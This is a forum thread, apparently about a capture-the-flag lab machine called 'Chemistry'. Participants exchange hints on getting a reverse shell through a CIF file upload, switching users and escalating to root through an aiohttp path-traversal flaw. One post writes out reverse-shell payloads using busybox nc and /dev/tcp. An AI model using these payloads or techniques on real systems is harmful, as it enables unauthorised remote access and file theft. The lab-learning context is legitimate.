Official Chemistry Discussion

I cracked the hash for the app user “rosa” from the DB but using the same password for ssh as user “rosa” does not work.

How do I switch from “app” to “rosa” linux user? what am I missing?

You can use your revshell to switch to the user manually

su rosa although this is not as interactive as ssh it should work if your ssh doesn’t.

why its taking forvever to upload my cif file

did you mean my using “su” within the reverse shell or a different way?
I’ve tried the “su rosa” with no luck.


Chemistry pwned

I’ve got stacked with root flag. I’ve got into machine. Got reverse shell and got user’s ssh password.

I’ve tried linpeas and found cve 2021-3560, but it didn’t work. Then I remembered about ports and that there was 8080 opened. I’ve forwarded this port via ssh -L. There’s Server: Python/3.9 aiohttp/3.9.1 and aiohttp 3.9.1 has cve 2024-23334, but it too doesn’t work. I’ve tried different scripts and even handmade-version by curl -s -path-as-is. But no result.

Can anyone help me, pls?

upd: I’ve done it, but why does this allows to read root files???..

Hi , you need try with “ss -tulpn” , another bug is waiting for you

I am also stuck on root flag. What did you do different after the curl -s -path-as-is? I feel like I am missing something tiny here and I cannot tell what it is. Driving me nuts.

Update: nvm I am an idiot. I just tried again with curl -s --path-as-is and it worked. I must have mistyped. Lesson learned, make sure I try every single discussion poster’s attempt first before I give up and post.

Can anyone point me in the right direction for formatting the payload? I’ve tried so many different variations using .system(“busybox nc 10.10.11.38 5000 -e /bin/bash 0>&1\'”) and “/bin/bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1'”

Everything I try results in a 500 Internal Server Error. I’ve got it parsing locally with a short python script but nothing on the web app

I don’t know what is or isnt a spoiler, so im going to tiptoe around this as best i can, but if you want more info let met know :smiley:

Check out revshells.com, they have a few good payloads, i used one of them for my shell!

1 Like

I am struggling on the last steps, I am exploiting the ahp exploit with the specific python script which allows me to brute force requests. However it always comes up with 404 errors. Does anyone have any ideas?

Hey, I’m stuck to find root flag, actually i have ssh to rosa, reverse shell to app, i tried the forwarding port 8080 and also the POCS on aiohttp but everytime i try to acces /root/ i have forbidenn acces

Can someone please help me :slight_smile:

May somebody help me? I kinda hit a roadblock :frowning:

I got the reverse shell through the CIF file, and then I got access to the rosa account.

I have no clue how to escalate my privs to root/get the root flag :frowning:

Try looking at services on local host

1 Like

somebody please help me i got user creds and connected to the target via ssh and got the user flag and find out the local host port 8080 and port forwarded it an curl it for the version and got the vulnerable aiohttp version and found the exploit and the PoC okay so how to exploit

am i on the right path or in a rabbit hole

how you got creds

same error

Turns out 500 server error is expected. Make sure you have a port configured in your payload and then start a netcat listener on that port (nc -lvn 4444 for example). The page will error out to 500 but you should see your shell reflected in the terminal.

If you’re not getting anything reflected in your terminal, try swapping to a different VPN or restarting the box. I was having the same issue with a correct payload and doing one (or both of these things) without changing my payload got me the rev shell

In netcat command its formatted like so
nc <your_ip> <your_port>

so it would look summat like this

nc 10.10.11.79 4444
Just ofcourse replace the port number with whichever port you wanna listen on!

For rosa, explore the sqlite database :smiley: